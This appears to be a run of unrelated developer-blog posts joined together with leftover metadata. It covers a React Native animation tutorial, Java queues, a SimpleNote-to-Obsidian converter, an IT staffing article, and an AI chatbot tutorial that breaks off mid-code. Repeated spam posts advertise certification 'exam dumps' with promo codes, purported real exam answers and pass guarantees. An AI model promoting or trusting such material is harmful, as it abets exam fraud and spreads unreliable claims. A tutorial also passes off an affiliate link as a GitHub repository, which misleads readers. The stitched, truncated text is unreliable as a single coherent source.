Reanimated 3 stands out from other animation libraries because it runs animations on the UI thread, not the JavaScript thread. This means animations remain smooth and responsive, even under heavy load or when the JavaScript thread is busy. Reanimated 3 also introduces a new declarative API, making it easier to create and manage animations.
---
## Setting Up Reanimated 3
Setting up Reanimated 3 with Expo is straightforward. Follow the steps below to get started.
---
### Step 1: Create a New Expo Project
First, we need to create a new Expo project using the Reanimated template:
```bash
yarn create expo-app my-app -e with-reanimated
cd my-app
yarn start --reset-cache
```
---
### Creating Basic Animations
Let’s start with a simple animation example: changing the width of a box when a button is pressed.
---
### Sample Animated App Code
The following code is for the App.js file created during the setup:
```javascript
import Animated, {
useSharedValue,
withTiming,
useAnimatedStyle,
Easing,
} from "react-native-reanimated";
import { View, Button } from "react-native";
import React from "react";
export default function AnimatedStyleUpdateExample(props) {
const randomWidth = useSharedValue(10);
const config = {
duration: 500,
easing: Easing.bezier(0.5, 0.01, 0, 1),
};
const style = useAnimatedStyle(() => {
return {
width: withTiming(randomWidth.value, config),
};
});
return (
<View
style={{
flex: 1,
alignItems: "center",
justifyContent: "center",
flexDirection: "column",
}}
>
<Animated.View
style={[
{ width: 100, height: 80, backgroundColor: "black", margin: 30 },
style,
]}
/>
<Button
title="toggle"
onPress={() => {
randomWidth.value = Math.random() * 350;
}}
/>
</View>
);
}
```
---
## 🤔 Looking for a resource to power up your React Native skills? Search no more! Check out this AMAZING hands-on guide. 🔥
### [React and React Native: A complete hands-on guide to modern web and mobile development with React.js](https://amzn.to/4eWJrzU)
---
## 🤓 Practical Tutorial: Building an Animated To-Do List 🛸
Now, let’s build a practical example – an animated to-do list app using Reanimated 3. This app will allow users to add, remove, and reorder tasks with smooth animations.
---
#### ✨ TL;DR – Checkout the GitHub Repo!✨
#### [🔗 ===> judescripts/rn-reanimated: DevToys.io blog tutorial on working with React Native Reanimated 3 (github.com)](https://amzn.to/4eWJrzU)
---
### Step 1: Set Up the Project
Create a new Expo project if you haven’t already:
```bash
yarn create expo-app my-todo-app -e with-reanimated
cd my-todo-app
```
---
### Step 2: Install react-native-gesture-handler
Ensure react-native-gesture-handler is installed:
```bash
yarn add react-native-gesture-handler
```
---
### Step 3: Implement the To-Do List
Create the ToDoList.js component:
```javascript
import React, { useState } from 'react';
import { View, TextInput, Button, StyleSheet, FlatList } from 'react-native';
import TaskItem from './TaskItem';
const ToDoList = () => {
const [tasks, setTasks] = useState([]);
const [task, setTask] = useState('');
const addTask = () => {
if (task.trim()) {
setTasks([...tasks, { id: Date.now().toString(), title: task }]);
setTask('');
}
};
const removeTask = (id) => {
setTasks((prevTasks) => prevTasks.filter((item) => item.id !== id));
};
const renderItem = ({ item }) => (
<TaskItem item={item} removeTask={removeTask} />
);
return (
<View style={styles.container}>
<TextInput
style={styles.input}
value={task}
onChangeText={setTask}
placeholder="Add a task"
/>
<Button title="Add Task" onPress={addTask} />
<FlatList
data={tasks}
renderItem={renderItem}
keyExtractor={(item) => item.id}
/>
</View>
);
};
const styles = StyleSheet.create({
container: {
flex: 1,
padding: 20,
},
input: {
height: 40,
borderColor: 'gray',
borderWidth: 1,
marginBottom: 10,
paddingHorizontal: 10,
},
});
export default ToDoList;
```
### Create the TaskItem.js component using the new Gesture Handler API:
```javascript
import React from 'react';
import { Text, StyleSheet } from 'react-native';
import Animated, { useSharedValue, useAnimatedStyle, withSpring, withTiming, runOnJS } from 'react-native-reanimated';
import { Gesture, GestureDetector } from 'react-native-gesture-handler';
const TaskItem = ({ item, removeTask }) => {
const translateX = useSharedValue(0);
const taskHeight = useSharedValue(70);
const animatedStyle = useAnimatedStyle(() => {
return {
transform: [{ translateX: translateX.value }],
height: taskHeight.value,
opacity: taskHeight.value / 70,
};
});
const panGesture = Gesture.Pan()
.onBegin(() => {
// Initialize context here if needed
})
.onUpdate((event) => {
translateX.value = event.translationX;
})
.onEnd(() => {
if (translateX.value < -150) {
translateX.value = withTiming(-200);
taskHeight.value = withTiming(0, {}, () => {
runOnJS(removeTask)(item.id);
});
} else {
translateX.value = withSpring(0);
}
});
return (
<GestureDetector gesture={panGesture}>
<Animated.View style={[styles.task, animatedStyle]}>
<Text>{item.title}</Text>
</Animated.View>
</GestureDetector>
);
};
const styles = StyleSheet.create({
task: {
height: 70,
backgroundColor: 'lightgrey',
justifyContent: 'center',
paddingHorizontal: 20,
marginBottom: 10,
borderRadius: 10,
},
});
export default TaskItem;
```
### Update your App.js to include the ToDoList component:
```javascript
import 'react-native-gesture-handler';
import 'react-native-reanimated';
import React from 'react';
import { GestureHandlerRootView } from 'react-native-gesture-handler';
import ToDoList from './ToDoList';
export default function App() {
return (
<GestureHandlerRootView style={{ flex: 1 }}>
<ToDoList />
</GestureHandlerRootView>
);
}
```
---
### Running the Project
To run the project, use the following commands based on the platform you want to test:
Start the Expo development server:
```bash
yarn start --reset-cache
```
This will give you options to choose the platform, or you can
Directly Start Run on iOS:
```bash
yarn ios
```
Directly Start Run on Android:
```bash
yarn android
```
---
🫠 Now try to add tasks and swipe to the left to delete and you’ll see some cool animations!🧙🏻♂️
---
## Conclusion
Reanimated 3 provides a powerful and efficient way to create high-performance animations in React Native. By running animations on the UI thread and offering a declarative API, Reanimated 3 ensures smooth and responsive animations, even under heavy load. In this tutorial, we built an animated to-do list app that allows users to add, remove, and reorder tasks with smooth animations. Start experimenting with Reanimated 3 today and take your React Native app’s user experience to the next level!
---
## Next Steps
For an additional challenge, try implementing the ability to reorder tasks within the to-do list. Share your results and any issues you encounter!
---
## 🫠 Did you enjoy this article? Then please visit [DevToys.io](https://devtoys.io) and subscribe to our newsletter so you can stay connected with all the latest dev news, tools and gadgets! ❤️ | 3a5abi |
1,917,826 | IT Staff Augmentation: Empowering Your Team for Success | Introduction In today's rapidly evolving technological landscape, businesses face increasing demands... | 0 | 2024-07-09T21:48:06 | https://dev.to/andrew_morgan_fef3e706051/it-staff-augmentation-empowering-your-team-for-success-271a | webdev, ai, news, discuss | **Introduction**
In today's rapidly evolving technological landscape, businesses face increasing demands to innovate, scale, and stay competitive. To meet these challenges, organizations are turning to IT staff augmentation as a strategic solution. This approach allows companies to enhance their existing teams with skilled professionals, providing the flexibility and expertise needed to tackle complex projects and drive growth. This article explores the concept of IT staff augmentation, its benefits, implementation strategies, and how it can be a game-changer for your organization.
****What is IT Staff Augmentation?
**Definition and Explanation**
IT staff augmentation is a flexible outsourcing strategy that enables companies to hire tech talent on a temporary basis to fill specific project needs or skill gaps within their existing teams. Unlike traditional hiring methods, staff augmentation allows businesses to quickly scale their workforce without the long-term commitment and overhead costs associated with permanent hires. This approach is particularly useful for projects that require specialized skills or when there's a sudden surge in workload.
**The Evolution of IT Staff Augmentation**
**Historical Context, Modern Trends**
The concept of staff augmentation has evolved significantly over the years. Initially, it was seen as a way to address short-term staffing shortages. However, with the advent of digital transformation, the demand for highly specialized IT skills has surged. Today, IT staff augmentation is not just about filling gaps but about strategically enhancing team capabilities to drive innovation and efficiency. Modern trends indicate a growing reliance on this model, especially in tech-centric industries where agility and expertise are paramount.
**Benefits of IT Staff Augmentation**
**Flexibility, Cost-Efficiency, Access to Expertise
**
One of the primary benefits of [IT staff augmentation](https://techgenies.com/it-staff-augmentation-guide/) is flexibility. Companies can scale their teams up or down based on project demands without the complexities of traditional hiring and firing processes. This approach is also cost-efficient, as it reduces the expenses related to recruitment, training, and employee benefits. Furthermore, IT staff augmentation provides access to a global pool of talent, allowing businesses to leverage specialized expertise that may not be available locally. This can significantly enhance the quality and speed of project delivery.
**Challenges in IT Staff Augmentation
Communication Barriers, Integration Issues**
While IT staff augmentation offers numerous advantages, it also comes with its own set of challenges. One common issue is communication barriers, especially when working with remote teams across different time zones. Ensuring seamless integration of augmented staff into existing teams can also be challenging. These professionals need to quickly adapt to the company’s workflows, culture, and tools, which requires effective onboarding and continuous support.
**Types of IT Staff Augmentation
Short-Term, Long-Term, Specialized Augmentation**
There are various types of IT staff augmentation to suit different needs. Short-term augmentation is ideal for projects with tight deadlines or temporary skill gaps. Long-term augmentation, on the other hand, involves integrating professionals into the team for extended periods, often spanning several months or even years. Specialized augmentation focuses on hiring experts with niche skills for highly technical or complex projects. Understanding these types helps businesses choose the right approach based on their specific requirements.
**When to Consider IT Staff Augmentation
Project Overloads, Skill Gaps, Tight Deadlines**
IT staff augmentation is particularly beneficial in situations where there is a sudden spike in project workload, significant skill gaps that need to be filled quickly, or tight deadlines that cannot be met with the current team. It allows businesses to bring in the necessary expertise and manpower to ensure project success without the delays and costs associated with traditional hiring processes. Companies facing digital transformation initiatives often find this model invaluable in meeting their strategic goals.
**How to Implement IT Staff Augmentation
Planning, Vendor Selection, Onboarding Process**
Implementing IT staff augmentation requires careful planning and execution. The first step is to clearly define the project requirements and the specific skills needed. Once this is established, selecting a reliable vendor or staffing partner is crucial. This involves evaluating potential partners based on their expertise, reputation, and ability to provide the necessary talent. The onboarding process should be well-structured to ensure that the augmented staff are integrated smoothly into the team and can start contributing effectively from day one.
**Choosing the Right IT Staff Augmentation Partner
Criteria, Red Flags, Best Practices**
Choosing the right IT staff augmentation partner is critical to the success of the initiative. Key criteria to consider include the partner’s industry experience, the quality of their talent pool, and their ability to provide support and resources throughout the engagement. It's also important to watch out for red flags such as a lack of transparency, poor communication, or a limited understanding of your business needs. Best practices include conducting thorough due diligence, seeking references, and establishing clear communication channels from the outset.
**Cost Considerations
Budgeting, ROI Analysis, Hidden Costs**
While IT staff augmentation can be cost-effective, it's essential to have a clear understanding of the associated costs. This includes not only the direct costs of hiring and compensating the augmented staff but also any hidden costs such as onboarding, training, and management overhead. Conducting a thorough ROI analysis can help businesses determine the financial viability of the augmentation initiative. Proper budgeting and cost management practices are essential to ensure that the project remains within financial constraints and delivers the expected value.
**Impact on In-House Teams
Collaboration, Morale, Knowledge Transfer**
Introducing augmented staff into an existing team can have significant impacts on collaboration, morale, and knowledge transfer. Effective collaboration between in-house and augmented staff is crucial for project success. This requires fostering an inclusive work environment where all team members feel valued and supported. While there might be initial concerns about job security or role clarity among in-house employees, transparent communication and inclusive practices can mitigate these issues. Additionally, augmented staff can bring new perspectives and expertise, facilitating valuable knowledge transfer and skill development within the team.
**Case Studies
Success Stories, Lessons Learned
**
Examining case studies of successful IT staff augmentation initiatives can provide valuable insights and lessons learned. These stories often highlight the challenges faced, the strategies implemented to overcome them, and the tangible benefits achieved. By learning from these real-world examples, businesses can better understand how to effectively implement and manage their own staff augmentation projects. Key takeaways from these case studies can inform best practices and help avoid common pitfalls.
**IT Staff Augmentation vs. Traditional Hiring
Speed, Flexibility, Cost Comparison**
Comparing IT staff augmentation with traditional hiring methods reveals several key advantages. Staff augmentation offers greater speed and flexibility, allowing businesses to quickly adapt to changing project demands without the long-term commitment of traditional hires. It also tends to be more cost-effective, as it | andrew_morgan_fef3e706051 |
1,917,827 | Desafio Decodificador - Chanllenge | Check out this Pen I made! | 0 | 2024-07-09T21:49:20 | https://dev.to/veronicacostaui/desafio-decodificador-chanllenge-3e61 | codepen | Check out this Pen I made!
{% codepen https://codepen.io/Veronicacosta-ui/pen/qBzEbXx %} | veronicacostaui |
1,917,828 | Queues and Priority Queues | In a priority queue, the element with the highest priority is removed first. A queue is a first-in,... | 0 | 2024-07-09T21:54:52 | https://dev.to/paulike/queues-and-priority-queues-3aji | java, programming, learning, beginners | In a priority queue, the element with the highest priority is removed first. A _queue_ is a first-in, first-out data structure. Elements are appended to the end of the queue and are removed from the beginning of the queue. In a _priority queue_, elements are assigned priorities. When accessing elements, the element with the highest priority is removed first. This section introduces queues and priority queues in the Java API.
## The Queue Interface
The **Queue** interface extends **java.util.Collection** with additional insertion, extraction, and inspection operations, as shown in Figure below.

The **offer** method is used to add an element to the queue. This method is similar to the **add** method in the **Collection** interface, but the **offer** method is preferred for queues. The **poll** and **remove** methods are similar, except that **poll()** returns **null** if the queue is empty, whereas **remove()** throws an exception. The **peek** and **element** methods are similar, except that **peek()** returns **null** if the queue is empty, whereas **element()** throws an exception.
## Deque and LinkedList
The **LinkedList** class implements the **Deque** interface, which extends the **Queue** interface, as shown in Figure below. Therefore, you can use **LinkedList** to create a queue. **LinkedList** is ideal for queue operations because it is efficient for inserting and removing elements from both ends of a list.

**Deque** supports element insertion and removal at both ends. The name _deque_ is short for “double-ended queue” and is usually pronounced “deck.” The **Deque** interface extends **Queue** with additional methods for inserting and removing elements from both ends of the queue. The methods **addFirst(e)**, **removeFirst()**, **addLast(e)**, **removeLast()**, **getFirst()**, and **getLast()** are defined in the **Deque** interface.
The code below shows an example of using a queue to store strings. Line 6 creates a queue using **LinkedList**. Four strings are added to the queue in lines 7–10. The **size()** method defined in the **Collection** interface returns the number of elements in the queue (line 12). The **remove()** method retrieves and removes the element at the head of the queue (line 13).

The **PriorityQueue** class implements a priority queue, as shown in Figure below. By default, the priority queue orders its elements according to their natural ordering using **Comparable**. The element with the least value is assigned the highest priority and thus is removed from the queue first. If there are several elements with the same highest priority, the tie is broken arbitrarily. You can also specify an ordering using **Comparator** in the constructor **PriorityQueue(initialCapacity, comparator)**.

The code below shows an example of using a priority queue to store strings. Line 7 creates a priority queue for strings using its no-arg constructor. This priority queue orders the strings using their natural order, so the strings are removed from the queue in increasing order. Lines 18 create a priority queue using the comparator obtained from **Collections.reverseOrder()**, which orders the elements in reverse order, so the strings are removed from the queue in decreasing order.
 | paulike |
1,917,829 | Building A SimpleNote to Obsidian notes converter | Building A SimpleNote to Obsidian notes converter See it in... | 0 | 2024-07-09T21:57:06 | https://dev.to/ayush_saran/building-a-simplenote-to-obsidian-notes-converter-33j9 | showdev, simplenote, obsidian, converter | # Building A SimpleNote to Obsidian notes converter
# See it in action:
https://simplenote-to-obsidian.fly.dev/
[](https://simplenote-to-obsidian.fly.dev/)
# WHY?
I like quickly jotting down notes in SimpleNote but after seeing [Obsidian](https://obsidian.md) pop up all over the web I was curious and decided to try it out. And I liked it, the ability to add more structure and link documents seemed like a great way to build up to a longer post by referencing snippets and sections that I had saved up as un-related notes in SimpleNote.
## The problem
SimpleNotes saves notes in .txt files and while it's easy to export out of SimpleNotes there's no direct way to transfer the notes over to Obsidian.
I tried looking into the official migration guide at:
https://help.obsidian.md/import
I even tried looking for community plugins that would handle this:
https://obsidian.md/plugins
It seemed bizarre that there was no official way to import from SimpleNotes, which is quite a popular platform. Then I stumbled across this python script from https://github.com/philgyford/simplenote-to-obsidian/blob/main/convert_notes.py and decided to build my own web version in JavaScript.
# HOW IT WORKS
1. Upload the JSON file from SimpleNote that contains an export of all the notes
2. Parse each note and convert the Tags into Obsidian compatible #Tags
3. Export this updated note into its own .md file
4. Change the modified date to reflect the date from the original SimpleNote file
5. Save these .md notes into a folder
6. Create a Zip for export that can be downloaded to import into Obsidian
# The stack
Usually I'd build this in NEXT.js and host it on Vercel but having recently run into a API route timeout I knew that Vercel allows only ~5-10 seconds for script execution in API routes (on the Hobby Tier) and I was worried that parsing the notes could take some time in larger collections so I built this as a simple Node + Express App and decided to try hosting it on Fly.io
It wasn't AS easy as connecting a github repo to Vercel, but within 20 mins I had my account setup on fly.io and the app deployed
# Challenges
### File Upload in Express v4
I just couldnt get the uploaded file through to the controller. The POST data from the form looked okay on the front-end and all my code looked ok on the Express end but any calls to req.body came up as an empty object {}!
I cracked my head around this for an hour before stumbling across this StackOverflow post where a kind poster pointed out that file uploads in forms are no longer handled by Express as of v4 and require an external library. I went with 'express-fileupload' https://www.npmjs.com/package/express-fileupload
### Creation Date
There is a function to update the 'Modified by' and 'Last Accessed' date in 'fs' for node that works across platforms but changing the 'Created At' date is trickier.
The fs-futimessync function does not handle 'Created At' dates
https://www.geeksforgeeks.org/node-js-fs-futimessync-method/?ref=lbp
I did stumble upon https://github.com/baileyherbert/utimes.
A Cross-platform native addon to change the btime, mtime, and atime of files in Node.js.
It seems to fix the issue for Win + Mac systems so I might give it a try for the next iteration of this tool
# Finally...
And that's it. I was finally able to build the tool and test it and it works great!
I was able to import all my SimpleNote data into Obsidian easily and the tags were preserved
# See it in action:
https://simplenote-to-obsidian.fly.dev/
[](https://simplenote-to-obsidian.fly.dev/)
Give it a go and let me know if it helps you.
# + BONUS
I've shared the tool as a github-repo for other people to mess around with
https://github.com/ayushsaranGithuB/simplenote-to-obsidian
Comments, criticisms, suggestions are welcome
Please file an issue if you find a bug: https://github.com/ayushsaranGithuB/simplenote-to-obsidian/issues | ayush_saran |
1,917,830 | "Amazon SAA-C03 PDF Dumps: Your Ultimate Guide to Achieve Success Effortlessly With CertifieDumps" | "Amazon SAA-C03 PDF Dumps: Your Ultimate Guide to Achieve Success Effortlessly With... | 0 | 2024-07-09T21:58:15 | https://dev.to/ella_henry_990efd16d535c5/amazon-saa-c03-pdf-dumps-your-ultimate-guide-to-achieve-success-effortlessly-with-certifiedumps-4bah | dumps, examdumps, saac03 |

"Amazon SAA-C03 PDF Dumps: Your Ultimate Guide to Achieve Success Effortlessly With CertifieDumps"
Finding success in the ever-evolving IT industry is not feasible without the Amazon Associate & AWS Certified Solutions Architect Associate SAA-C03 certification. Luckily, with the help of Certifiedumps, achieving this certification can be a smooth journey. With their genuine and up-to-date Amazon SAA-C03 exam dumps, your path to excellence begins!
"This unique course is designed for various professionals ranging from Students preparing for the Amazon Web Services Certified (AWS Certified) Solutions Architect Associate (SAA-C03) Exam, Amazon Web Services (AWS) Engineers, Azure Engineers, Cloud Architects, Cloud Engineers, DevOps Engineers, GCP Engineers, Infrastructure Engineers, to Solution Architects, Security Engineers, and much more!
''The best part? No prior knowledge is required - you can pass the exam solely based on our practice test exams."
Regardless of your device or operating system, Certifiedumps is compatible and user-friendly. Its web-based practice test, which includes all features of the desktop practice exam program, runs smoothly on Chrome, Firefox, Opera, Safari, and Internet Explorer, offering the flexibility to cater to individuals using Mac, iOS, Linux, Android, or Windows.
"And this is just in - with the coupon code FLAT25OFF, you can now receive a 25% discount. Moreover, Certifiedumps offers free updates for up to 90 days so that you're always on track with the current exam pattern. If you need more than that, their 100% free Amazon Associate & AWS Certified Solutions Architect Associate SAA-C03 exam upgrades will ensure your success in the first attempt. So wait no more, get started with Certifiedumps and watch your career soar!"
TO VISIT SITE 🕳 https://www.certifiedumps.com/amazon/saa-c03-dumps.html | ella_henry_990efd16d535c5 |
1,917,831 | Unlock Instant Success: Exclusive Top Picks for Refreshed EX200 Dumps Exam Questions 2024/2025 | Are you craving to conquer the Red Hat exam on your first attempt? Leverage the authentic... | 0 | 2024-07-09T22:01:46 | https://dev.to/ella_henry_990efd16d535c5/unlock-instant-success-exclusive-top-picks-for-refreshed-ex200-dumps-exam-questions-20242025-3pji |

Are you craving to conquer the Red Hat exam on your first attempt? Leverage the authentic CertifiesDumps EX200 dumps (questions). By authenticating your knowledge and skills with the EX200 certification exam, you can secure well-paying jobs and promotions in today's fiercely competitive IT job market. The path to preparing for the EX200 certification test can indeed be daunting. Many fall short of passing the RHCSA EX200 examination due to needing to utilize the most updated RHCSA EX200 questions.
The good news? CertifiesDumps presents you with RedHat EX200 accurate and latest questions available in three modes: desktop RHCSA EX200 practice exam software, web-based EX200 practice exam, and EX200 PDF. These EX200 questions are not only genuine but also firmly anchored in the syllabus.
CertifiesDumps, with our Red Hat Certified System Administrator EX200 actual test questions, has aided hundreds in acing the RedHat EX200 exam with flying colors. Join the ranks of those certified on the first try using our real EX200 questions.
**EX200 Real Dumps Questions Answers for Certification Success
**RedHat EX200 Sample Questions Question # 1 Part 2 (on Node2 Server) Task 8 [Tuning System Performance] Set your server to use the recommended tuned profile Answer: See the Explanation below: Explanation: [root@node2 ~]# tuned-adm list [root@node2 ~]# tuned-adm active Current active profile: virtual-guest [root@node2 ~]# tuned-adm recommend virtual-guest [root@node2 ~]# tuned-adm profile virtual-guest [root@node2 ~]# tuned-adm active Current active profile: virtual-guest [root@node2 ~]# reboot [root@node2 ~]# tuned-adm active Current active profile: virtual-guest Show Answer Question # 2 Part 2 (on Node2 Server) Task 2 [Installing and Updating Software Packages] Configure your system to use this location as a default repository: http://utility.domain15.example.com/BaseOS http://utility.domain15.example.com/AppStream Also configure your GPG key to use this location http://utility.domain15.example.com/RPM-GPG-KEY-redhat-release Answer: See the Explanation below: Show Answer Question # 3 A YUM source has been provided in the http://instructor.example.com/pub/rhel6/dvd Configure your system and can be used normally. Answer: see explanation below. Show Answer Question # 4 Part 1 (on Node1 Server) Task 15 [Running Containers] Create a container named logserver with the image rhel8/rsyslog found from the registry registry.domain15.example.com:5000 The container should run as the root less user shangrila. use redhat as password [sudo user] Configure the container with systemd services as the shangrila user using the service name, “container-logserver” so that it can be persistent across reboot. Use admin as the username and admin123 as the credentials for the image registry. Answer: See the Explanation below: Explanation: * [root@workstation ~]# ssh shangrila@node1 [shangrila@node1 ~]$ podman login registry.domain15.example.com:5000 Username: admin Password: Login Succeeded! [shangrila@node1 ~]$ podman pull registry.domain15.example.com:5000/rhel8/rsyslog [shangrila@node1 ~]$ podman run -d --name logserver registry.domain15.example.com:5000/rhel8/rsyslog 021b26669f39cc42b8e94eab886ba8293d6247bf68e4b0d76db2874aef284d6d [shangrila@node1 ~]$ mkdir -p ~/.config/systemd/user [shangrila@node1 ~]$ cd ~/.config/systemd/user * [shangrila@node1 user]$ podman generate systemd --name logserver --files --new /home/shangrila/.config/systemd/user/container-logserver.service [shangrila@node1 ~]$ systemctl --user daemon-reload [shangrila@node1 user]$ systemctl --user enable --now container-logserver.service [shangrila@node1 ~]$ podman ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 7d9f7a8a4d63 registry.domain15.example.com:5000/rhel8/rsyslog:latest /bin/rsyslog.sh 2 seconds ago logserver [shangrila@node1 ~]$ sudo reboot [shangrila@node1 ~]$ cd .config/systemd/user [shangrila@node1 user]$ systemctl --user status Show Answer Question # 5 There is a server having 172.24.254.254 and 172.25.254.254. Your System lies on172.24.0.0/16. Make successfully ping to 172.25.2
https://www.certifiedumps.com/redhat/ex200-dumps.html
Test-drive a free RedHat EX200 questions demo now and put any lingering doubts to rest.
CertifiesDumps offers the most recent EX200 questions in all three formats. In addition, we keep you updated with free EX200 exam question updates for up to 90 days. CertifiesDumps is committed to customer satisfaction, reflected in the free demos offered for our EX200 PDF questions and practice exams. Before making a purchase, you can download a free demo of the RHCSA EX200 prep material and validate its authenticity. Don't wait; jump-start your preparation for the EX200 exam today. Best of luck!
Your Top Picks: Refreshed EX200 Dumps for 2024/2025 Prep
Earning the Red Hat Certified System Administrator (RHCSA) accreditation is no small feat. As part of your preparation for this crucial certification, one of the most important tasks you have is to familiarize yourself with the up-to-date exam questions or dumps, often referred to as EX200 dumps.
Relevant keywords: EX200 dumps (exam questions) 2024 | EX200 questions (exam dumps) 2K24 | EX200 exam dumps | EX200 exam questions | EX200 exam promo code
TO GET INFO ON THIS : ❗ https://www.certifiedumps.com/redhat/ex200-dumps.html 💯 | ella_henry_990efd16d535c5 | |
1,917,833 | latest Microsoft AZ-700 Questions - Right Path for Your Career | CertifieDumpds is one of the best brands in the market that offers updated & accurate exam... | 0 | 2024-07-09T22:04:44 | https://dev.to/ella_henry_990efd16d535c5/latest-microsoft-az-700-questions-right-path-for-your-career-4l7f |

CertifieDumpds is one of the best brands in the market that offers updated & accurate exam preparation material for the certification exam. If you are looking for certification exam preparation material then you do not need to worry more, just stay on our site. We make sure that we have the best deal for your exam preparation material containing realistic exam questions to ensure your pass .
We cover almost all types of the exam preparation material. Experienced and certified subject specialists prepare our certification exam questions. The AZ-700 Exam is a cutting-edge certification program designed to equip aspiring cybersecurity professionals with the specialized skills needed to excel in the rapidly evolving world of security operations centers (SOCs). This comprehensive exam is the ideal stepping stone for individuals seeking to become SOC analysts.
To pass the AZ-700 Exam, candidates must have a strong understanding of Azure concepts and technologies, including Azure infrastructure, Azure resource management, Azure Identity, Azure governance, and Azure security. The exam consists of a series of multiple-choice and performance-based questions that test the candidate's knowledge of Azure concepts and their ability to apply that knowledge to real-world scenarios .Upon successfully passing the AZ-700 Exam, individuals will earn the Microsoft Certified: Azure Security Engineer Associate certification, demonstrating their expertise in implementing and managing Azure security controls, policies, and technologies. Overall, the AZ-700 Exam is a valuable certification for individuals looking to advance their careers in cloud computing, particularly in the field of Azure security.
FOR MORE : https://www.certifiedumps.com/microsoft/az-700-dumps.html
Trust CertifieDumps with IT Exams and you are Trusting the Best
Get unlimited access to 600+ IT Exams and Pass the Exams according to your Requirements
Explore a variety of Fresh Topics
Get Regular Free Updates to All Exams until you have Access
Secure IT Jobs after Passing the Certifications
Microsoft AZ-700 Exam Information:
Vendor: Microsoft
Exam Code: AZ-700
Exam Name: AZ-700 Designing and Implementing Microsoft
Certification Name: Bundle pack includes
Number of Questions: 30
Start free online test engine
Exam Format: MCQs
Exam Language: English
Why CertifieDumps exam preparation materials are the best?
Free PDF and Exam Software Demos
CertifieDumps offers practice exam questions, valid preparation material in three effective formats PDF (all device types and OS supported), Desktop Practice Test Software, and Web-Based Practice Exam. We also offer a free demo which allows you to check every feature of our exam preparation material before the purchase.
Get Special Discount Offer | Extra 25% Off - Instant Download AZ-700
Exam Questions: AZ-700 Designing and Implementing Microsoft Azure Networking Solutions Exam
Is there a guarantee that me passing the exam?
Of course. Our questions and answers will let you pass the real exam. If this material cannot do it, then probably nothing else can.
Certifiedumps Microsoft AZ-700 PDF Dumps File and Practice Test Software:
The Certifiedumps is a trusted platform offering real and updated Channel Partner Program AZ-700 Exam practice questions in three different formats. The name of these certifiedumps Channel Partner Program AZ-700 Exam dumps formats is PDF questions files, desktop practice test software, and web-based AZ-700 Exam practice test software. All these three AZ-700 Exam questions formats are easy to use and compatible with all devices, operating systems, and web browsers. The certifiedumps Channel Partner Program AZ-700 Exam PDF dumps file contains real, valid, and verified AZ-700 exam questions. These Certifiedumps AZ-700 Exam PDF dumps are designed and verified by Channel Partner Program AZ-700 certification exam trainers. They work together and ensure the top standard of certifiedumps Channel Partner Program AZ-700 Exam PDF questions and you can install them on your desktop computer, laptop, and tabs or even on your smartphone devices and start preparation anywhere and anytime. Whereas the other desktop Channel Partner Program AZ-700 Exam practice test software and web-based practice test software are concerned both are the mock AZ-700 Exam that will give you a real-time AZ-700 Exam environment for preparation. Good luck with the AZ-700 Exam and your career!!!
Exam Duration: 90 minutes
Exam Language: English | ella_henry_990efd16d535c5 | |
1,917,834 | Klein Bottle | Check out this Pen I made! | 0 | 2024-07-09T22:08:48 | https://dev.to/dan52242644dan/klein-bottle-3haf | codepen, ai, html, javascript | Check out this Pen I made!
{% codepen https://codepen.io/Dancodepen-io/pen/rNEaxrz %} | dan52242644dan |
1,917,836 | Build Generative AI Chatbot | Introduction In this article, you will learn how to build a generative AI chatbot that... | 0 | 2024-07-09T22:15:23 | https://dev.to/jhonnyarm/build-generative-ai-chatbot-4epc | gradio, openapi, sqlalchemy, langchain | ## Introduction
In this article, you will learn how to build a generative AI chatbot that leverages OpenAI's GPT-3.5 to provide personalized and accurate responses to user queries. By integrating a pretrained LLM with a dynamic SQLite database, you'll create an intelligent chatbot capable of handling domain-specific questions. This tutorial will cover setting up the environment, configuring the AI model, and building an interactive user interface using Gradio.
### Why Use Generative AI in Chatbots?
Using Generative AI in chatbots offers several key advantages, including:
#### Personalized Responses:
Generative AI enables chatbots to generate responses that are tailored and relevant to each user's specific queries, leading to a more engaging and satisfying user experience.
#### Natural Language Understanding:
Generative AI models like GPT-3.5 have advanced natural language understanding capabilities, allowing the chatbot to comprehend complex queries and provide accurate answers.
#### Contextual Awareness:
These AI models can maintain context across interactions, which helps in providing coherent and contextually appropriate responses even in multi-turn conversations.
## Requirements
To successfully build and deploy this generative AI chatbot, you should have a basic understanding or knowledge of the following:
- Basic understanding of Large Language Models (LLMs) and how they can be applied to natural language processing tasks.
- Basic knowledge of Python programming, including working with libraries and writing scripts.
- Familiarity with how to use APIs, including making requests and handling responses.
### Tools and Technologies
- OpenAI GPT-3.5: Used for interpreting natural language queries and generating SQL queries.
- LangChain: Facilitates integration with OpenAI and helps create SQL agents.
- SQLAlchemy: Manages database interactions and operations.
- Pandas: Handles reading and processing of Excel files.
- Gradio: Creates interactive user interfaces.
- SQLite: Acts as the database to store and query data.
- Dotenv: Loads environment variables from a .env file.
## Flow diagram
The following diagram illustrates how this chatbot operates.

### Project Setup
- Create requirements.txt and copy the following code.
```bash
openai==0.27.0
langchain==0.0.152
sqlalchemy==1.4.41
pandas==1.4.3
gradio==2.7.5
python-dotenv==0.20.0
```
- Install Dependencies: Using requirements.txt.
```bash
pip install -r requirements.txt
```
- Create the .env File:
```bash
OPENAI_API_KEY=OPENAI-TOKEN-HERE
OPENAI_API_BASE=https://api.openai.com/v1
```
Replace YOUR-OPENAI-API-KEY with your actual API key obtained from OpenAI.
- Create a file called "app"
```bash
import os
import gradio as gr
from langchain_community.chat_models import ChatOpenAI
from langchain_community.agent_toolkits.sql.base import create_sql_agent
from langchain_community.utilities import SQLDatabase
from langchain_community.tools import Tool
from langchain.memory import ConversationBufferMemory
from dotenv import load_dotenv
from sqlalchemy import create_engine, inspect, text
from loader import create_demand_table
# Load environment variables
load_dotenv()
# Configure the language model with OpenAI directly
llm = ChatOpenAI(
api_key=os.getenv("OPENAI_API_KEY"),
model_name="gpt-3.5-turbo-0125",
temperature=0.1,
)
# Initialize the database engine
engine = create_engine('sqlite:///db.sqlite3', echo=True)
# Function to process the uploaded file and create a table
def process_file(file):
db = create_demand_table(engine, 'dynamic_table', file.name)
return db
# Define a function to execute SQL queries
def run_sql_query(query):
with engine.connect() as connection:
result = connection.execute(text(query))
return [dict(row) for row in result]
# Create a tool that executes SQL queries
sql_tool = Tool(
name="SQLDatabaseTool",
func=run_sql_query,
description="Tool for executing SQL queries on the database."
)
# Configure the conversational agent's memory
memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)
# Function to handle user queries and process them with the SQL tool
